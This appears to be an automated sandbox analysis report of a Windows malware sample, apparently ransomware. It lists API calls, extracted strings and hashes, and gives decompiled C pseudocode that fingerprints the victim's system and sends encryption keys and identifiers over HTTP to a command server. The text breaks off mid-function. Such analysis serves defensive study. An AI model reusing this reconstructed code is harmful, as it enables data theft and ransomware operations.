0x0f147acb
0x00000000
0x0f147acb
0x0f147a52
0x0f147a55
0x0f147a57
0x0f147a5c
0x0f147a68
0x0f147a6b
0x0f147a6d
0x0f147a70
0x0f147a79
0x0f147a8a
0x0f147a98
0x0f147a9a
0x0f147aac
0x0f147ab4
0x0f147abf
0x0f147abf
0x0f147ad6
0x0f147ad7
0x0f147ada
0x0f147ae6
0x0f147ae8
0x0f147aed
0x00000000
0x0f147aed
0x0f147761
0x0f147765
0x0f147776
0x0f147778
0x0f14777c
0x0f147782
0x0f1477c3
0x0f1477c3
0x0f1477c8
0x0f1477c9
0x0f1477cb
0x00000000
0x0f1477cb
0x0f147784
0x0f14778b
0x00000000
0x0f1477bc
0x00000000
0x00000000
0x0f1477ae
0x00000000
0x00000000
0x0f1477b5
0x00000000
0x00000000
0x0f1477a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0f14778b
0x0f14775f
0x0f14760d
0x0f147616
0x0f147620
0x0f147623
0x0f147625
0x0f147628
0x0f14762d
0x0f147634
0x0f14763d
0x0f14763f
0x0f147642
0x0f14764c
0x0f14765f
0x0f147667
0x0f1476c4
0x0f1476c4
0x0f1476c6
0x00000000
0x0f1476c6
0x0f14766c
0x0f147681
0x0f147689
0x0f147694
0x0f14768b
0x0f14768b
0x0f14768b
0x0f14769d
0x0f1476a7
0x00000000
0x0f1476a9
0x0f1476b9
0x0f14779a
0x0f14779c
0x0f1477a1
0x0f1477a1
0x0f1476bf
0x0f1476bf
0x0f1476c9
0x0f1476c9
0x0f1476de
0x0f1476e0
0x0f1476ed
0x00000000
0x0f1476f3
0x0f14756e
0x0f147570
0x0f147573
0x0f14758b
0x0f147592
0x0f14759a
0x0f1475de
0x0f1475e8
0x0f1475ef
0x00000000
0x0f1475ef
0x0f14759f
0x0f1475b6
0x0f1475be
0x0f1475c9
0x0f1475c0
0x0f1475c0
0x0f1475c0
0x0f1475d2
0x0f1475dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0f147502
0x0f147510
0x0f147512
0x0f147517
0x00000000
0x00000000
0x0f147519
0x0f14752f
0x0f147536
0x0f147551
0x0f147551
0x0f147553
0x00000000
0x0f147553
0x0f147538
0x0f14753f
0x00000000
0x00000000
0x0f147551
0x00000000
0x0f147551

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
GetComputerNameW.KERNEL32 ref: 0F1474F0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
wsprintfW.USER32 ref: 0F147551
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
GetLastError.KERNEL32 ref: 0F1475C9
RegCloseKey.KERNEL32(00000000), ref: 0F1475D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1475EF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F14760D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F147623
wsprintfW.USER32 ref: 0F14763D
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F14765F
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F144810,?), ref: 0F147681
GetLastError.KERNEL32 ref: 0F147694
RegCloseKey.KERNEL32(?), ref: 0F14769D
lstrcmpiW.KERNEL32(0F144810,00000419), ref: 0F1476B1
wsprintfW.USER32 ref: 0F1476DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1476ED
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F14770D
wsprintfW.USER32 ref: 0F147756
GetNativeSystemInfo.KERNEL32(?), ref: 0F147765
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F147776
wsprintfW.USER32 ref: 0F14779A
ExitProcess.KERNEL32 ref: 0F1477A1
wsprintfW.USER32 ref: 0F1477C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F147807
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F14781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F147824
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F14785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147890
wsprintfW.USER32 ref: 0F1478C8
lstrcatW.KERNEL32(?,0000060C), ref: 0F1478DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F1478E9
GetProcAddress.KERNEL32(00000000), ref: 0F1478F0
lstrlenW.KERNEL32(?), ref: 0F147900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F147931

Part of subcall function 0F147B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F147B8D
Part of subcall function 0F147B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F147C01
Part of subcall function 0F147B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F147C16
Part of subcall function 0F147B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F147C2C

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F147988
GetDriveTypeW.KERNEL32(?), ref: 0F1479CF
lstrcatW.KERNEL32(?,?), ref: 0F1479F6
lstrcatW.KERNEL32(?,0F15030C), ref: 0F147A08
lstrcatW.KERNEL32(?,0F150380), ref: 0F147A12
GetDiskFreeSpaceW.KERNEL32(?,?,0F144810,?,00000000), ref: 0F147A28
lstrlenW.KERNEL32(?,?,00000000,0F144810,00000000,00000000,00000000,0F144810,00000000), ref: 0F147A70
wsprintfW.USER32 ref: 0F147A8A
lstrlenW.KERNEL32(?), ref: 0F147A98
wsprintfW.USER32 ref: 0F147AAC
lstrcatW.KERNEL32(?,0F1503A0), ref: 0F147ABF
lstrcatW.KERNEL32(?,0F1503A4), ref: 0F147ACB
lstrlenW.KERNEL32(?), ref: 0F147AE6
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F147B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F147B30

Strings

Unknown, xrefs: 0F1477C3
ntdll.dll, xrefs: 0F1478E4
Domain, xrefs: 0F147520
WORKGROUP, xrefs: 0F147541
LocaleName, xrefs: 0F1475AE
Control Panel\International, xrefs: 0F147581
x64, xrefs: 0F1477A7
ProcessorNameString, xrefs: 0F147871
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0F147876, 0F1478AB
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0F147525
RtlComputeCrc32, xrefs: 0F1478DF
undefined, xrefs: 0F147549
00000419, xrefs: 0F1476A9
Keyboard Layout\Preload, xrefs: 0F147655
Identifier, xrefs: 0F1478A6
ARM, xrefs: 0F1477AE
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0F14771B
@, xrefs: 0F14759F
%I64u, xrefs: 0F147AA3
productName, xrefs: 0F147716, 0F14773A
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0F14773F
%I64u/, xrefs: 0F147A84
error, xrefs: 0F14774E
Itanium, xrefs: 0F1477B5
?:\, xrefs: 0F1479AD
x86, xrefs: 0F1477BC
i)w, xrefs: 0F1476B1

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-3138453034
Opcode ID: a59ac10d38607bfa00e80afb2142594abd71922887415ad0fdf6c233e4e7c8b6
Instruction ID: 12ee1d9e2695829ebe0ddd4845d2b1e92fa42be0ab1f53841d36ba39aa2e224c
Opcode Fuzzy Hash: a59ac10d38607bfa00e80afb2142594abd71922887415ad0fdf6c233e4e7c8b6
Instruction Fuzzy Hash: FE12B170A80305EFEB219FA0CC49FAABBB8FF88B05F100519FA51A61D1D7B5B564CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F145860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0F145860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0F143BC0( &_v148);
				E0F147490( &_v236, __edx); // executed
				_t266 = E0F1472A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0F147D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0F1470A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0F1435C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xf152a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xf152a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0F145F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0F1454F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0F147D70( &_v200);
						return 0;
					}
				}
			}

0x0f14586f
0x0f145870
0x0f145872
0x0f145873
0x0f145878
0x0f14587e
0x0f145882
0x0f145884
0x0f145885
0x0f145887
0x0f145888
0x0f14588a
0x0f14588b
0x0f14588d
0x0f14588e
0x0f145890
0x0f145893
0x0f145895
0x0f145896
0x0f14589f
0x0f1458a8
0x0f1458b9
0x0f1458bb
0x0f1458c4
0x0f1458ca
0x0f1458d0
0x0f1458d6
0x0f1458d8
0x0f1458dc
0x0f1458e3
0x0f1458ec
0x0f145901
0x0f145905
0x0f1458f2
0x0f1458f2
0x0f1458f5
0x0f1458f9
0x0f1458fd
0x0f1458fd
0x0f14590f
0x0f145916
0x0f14592f
0x0f14592f
0x0f145931
0x0f145918
0x0f145918
0x0f14591d
0x00000000
0x0f14591f
0x0f14591f
0x0f145921
0x0f145925
0x0f145927
0x0f145929
0x0f145929
0x0f14591d
0x0f14593a
0x0f14593e
0x0f14594d
0x0f14594f
0x0f14594f
0x0f14595b
0x0f145d98
0x0f145da3
0x0f145da9
0x0f145db9
0x0f145961
0x0f145961
0x0f14596d
0x0f145980
0x0f145985
0x0f145999
0x0f1459a2
0x0f1459b6
0x0f1459bb
0x0f1459c5
0x0f1459c9
0x0f1459cd
0x0f1459d5
0x0f1459d7
0x0f1459db
0x0f1459de
0x0f1459f5
0x0f1459e4
0x0f1459e7
0x0f1459eb
0x0f1459ef
0x0f1459ef
0x0f145a00
0x0f145a06
0x0f145a10
0x0f145a10
0x0f145a1c
0x0f145a22
0x0f145a24
0x0f145a30
0x0f145a30
0x0f145a34
0x0f145a39
0x0f145a3f
0x0f145a41
0x0f145a41
0x0f145a43
0x0f145a46
0x0f145a4a
0x0f145a4a
0x0f145a4f
0x0f145a55
0x0f145a57
0x0f145a5b
0x0f145a60
0x0f145a60
0x0f145a65
0x0f145a6b
0x0f145a6e
0x0f145a6e
0x0f145a73
0x0f145a74
0x0f145a76
0x0f145a7a
0x0f145a60
0x0f145a7e
0x0f145a8e
0x0f145a9b
0x0f145a9f
0x0f145aa3
0x0f145aac
0x0f145ab8
0x0f145ac0
0x0f145ac7
0x0f145aca
0x0f145aca
0x0f145ad6
0x0f145ad8
0x0f145ade
0x0f145aea
0x0f145af0
0x0f145af9
0x0f145b0d
0x0f145b17
0x0f145b19
0x0f145b23
0x0f145b30
0x0f145b4a
0x0f145b50
0x0f145b5a
0x0f145b61
0x0f145b63
0x0f145b79
0x0f145b88
0x0f145ba6
0x0f145bb6
0x0f145bbc
0x0f145bc3
0x0f145bc9
0x0f145bd3
0x0f145bcf
0x0f145bcf
0x0f145bcf
0x0f145bd9
0x0f145bdb
0x0f145be1
0x0f145be7
0x0f145bf1
0x0f145bf1
0x0f145c0b
0x0f145c11
0x0f145c18
0x0f145c25
0x0f145c2b
0x0f145c2b
0x0f145c36
0x0f145c3b
0x0f145c4b
0x0f145c67
0x0f145c69
0x0f145c69
0x0f145c79
0x0f145c79
0x0f145c86
0x0f145c8c
0x0f145c8c
0x0f145c8f
0x0f145c95
0x0f145c9f
0x0f145c9f
0x0f145c97
0x0f145c97
0x0f145c9d
0x00000000
0x00000000
0x0f145c9d
0x0f145ca8
0x0f145cae
0x0f145cb4
0x0f145cb8
0x0f145cb8
0x0f145cbd
0x0f145cc3
0x0f145cc6
0x0f145cc6
0x0f145ccb
0x0f145ccc
0x0f145cce
0x0f145cd2
0x0f145cb8
0x0f145cd6
0x0f145cec
0x0f145cf9
0x0f145d03
0x0f145d0d
0x0f145d5c
0x0f145d62
0x0f145d67
0x0f145d67
0x0f145d7b
0x0f145d89
0x0f145d96
0x00000000
0x0f145d0f
0x0f145d20
0x0f145d2e
0x0f145d3b
0x0f145d48
0x0f145d4e
0x0f145d5b
0x0f145d5b
0x0f145d0d

APIs

Part of subcall function 0F143BC0: GetProcessHeap.KERNEL32(?,?,0F144807,00000000,?,00000000,00000000), ref: 0F143C5C

Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
Part of subcall function 0F147490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
Part of subcall function 0F147490: GetComputerNameW.KERNEL32 ref: 0F1474F0
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
Part of subcall function 0F147490: wsprintfW.USER32 ref: 0F147551
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
Part of subcall function 0F147490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
Part of subcall function 0F147490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
Part of subcall function 0F147490: RegCloseKey.KERNEL32(00000000), ref: 0F1475D2

Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F1458D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F145980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F145999
lstrlenA.KERNEL32(00000000), ref: 0F1459A2
lstrlenA.KERNEL32(?), ref: 0F1459AA
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F1459BB
lstrlenA.KERNEL32(?), ref: 0F1459D5
lstrlenA.KERNEL32(00000000), ref: 0F1459FE
lstrlenA.KERNEL32(?), ref: 0F145A1E

Strings

action=call&, xrefs: 0F145A88
&priv_key=, xrefs: 0F145B54
popkadurak, xrefs: 0F145BFE, 0F145C1A
&id=, xrefs: 0F145AD0
&subid=, xrefs: 0F145AE4
&version=2.3.1r, xrefs: 0F145B7F
&pub_key=, xrefs: 0F145B1D

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: 591842b9fbd390e465997e08142e4e6aeb56bd34096973b32ba5e6030f8bf078
Instruction ID: 778b8789206fa4ef8d66b013003fbc1b7361d5dc6ab9915c34ca30cb2cf0685a
Opcode Fuzzy Hash: 591842b9fbd390e465997e08142e4e6aeb56bd34096973b32ba5e6030f8bf078
Instruction Fuzzy Hash: 94F1CC71248301AFE710DF24DC85B6BBBAAEFC8B14F04091CF585A7291DB74F9198B66

Uniqueness

Uniqueness Score: -1.00%

Function 0F148050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F148050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F147E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
